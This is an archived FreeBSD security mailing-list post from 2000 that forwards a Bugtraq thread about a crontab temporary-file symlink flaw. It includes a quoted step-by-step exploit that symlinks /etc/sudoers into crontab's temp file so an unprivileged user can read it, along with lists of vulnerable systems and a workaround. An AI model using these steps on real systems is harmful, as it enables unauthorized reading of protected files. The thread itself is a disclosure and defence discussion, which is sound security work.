Date: Thu, 26 Oct 2000 14:36:25 +0200 (MET DST) From: Konrad Heuer <kheuer@gwdg.de> To: freebsd-security@freebsd.org Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability (fwd) Message-ID: <Pine.OSF.4.10.10010261430310.2401-100000@gwdu20.gwdg.de>
next in thread | raw e-mail | index | archive | help
Exploit below could be reproduced on 4.1-R and Compaq Tru64 UNIX 4.0D;
seems to depend on the way vi stores edit info in /tmp. Exploit does not
work with emacs, e.g.
I removed suid bit of crontab as a workaround.
Its not possible for a user to modify files owned by someone else in this
way.
Regards
K. Heuer (kheuer@gwdg.de)
---------- Forwarded message ----------
Date: Wed, 25 Oct 2000 12:30:47 +0200
From: "Fabio Pietrosanti (naif)" <fabio@telemail.it>
Reply-To: naif@inet.it
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file
symboliclink vulnerability
Resent-Date: Thu, 26 Oct 2000 14:17:27 +0200 (MET DST)
Resent-From: Eckhard Handke <ehandke@gwdg.de>
Resent-To: Konrad Heuer <kheuer@gwdg.de>
Resent-Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file
symboliclink vulnerability
Tested also on:
FreeBSD 3.3 = Vulnerable
FreeBSD 2.2.8 = Vulnerable
Aix 4.2 = Not Vulnerable
Linux Slackware 7.0 = Not Vulnerable
Linux Slackware 4.0 = Not Vulnerable
naif
On Tue, 24 Oct 2000, Sergey Nenashev wrote:
> Hi,
>
> Tested on
> 4.0-RELEASE FreeBSD 4.0-RELEASE #9
> 4.1-RELEASE FreeBSD 4.1-RELEASE #1:
>
>
> Can read any file wich start with comment simbol (#)
>
>
>
> $ ls -l /etc/sudoers
> -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
> $ id
> uid=1002(alf) gid=1002(alf) groups=1002(alf)
>
>
> $ crontab -e
> ~
> ~
> ~
> /tmp/crontab.hLmjTbK417
> :!sh
>
> [ #### Make simbolik link]
> > rm /tmp/crontab.hLmjTbK417
> > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
> > exit
>
> [ #### quit vi ]
> /tmp/crontab.hLmjTbK417
> crontab: installing new crontab
>
> [ #### start crontab editor]
>
> $ crontab -e
> [####### See in vi]
> # sudoers file.
> #
> # This file MUST be edited with the 'visudo' command as root.
> #
> # See the sudoers man page for the details on how to write a sudoers
> file.
> #
>
> # Host alias specification
>
> # User alias specification
>
> # Cmnd alias specification
>
> # User privilege specification
> root ALL=(ALL) ALL
> alf ALL=(ALL) ALL
> ~
> ~
> ~
>
>
>
>
> If file started with no # then crontab sad
>
> "/tmp/crontab.GAeNMP1357":2: bad minute
> crontab: errors in crontab file, can't install
>
>
>
>
> --
> ------
> Alf Delems<alf@isd.memonet.ru>
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.OSF.4.10.10010261430310.2401-100000>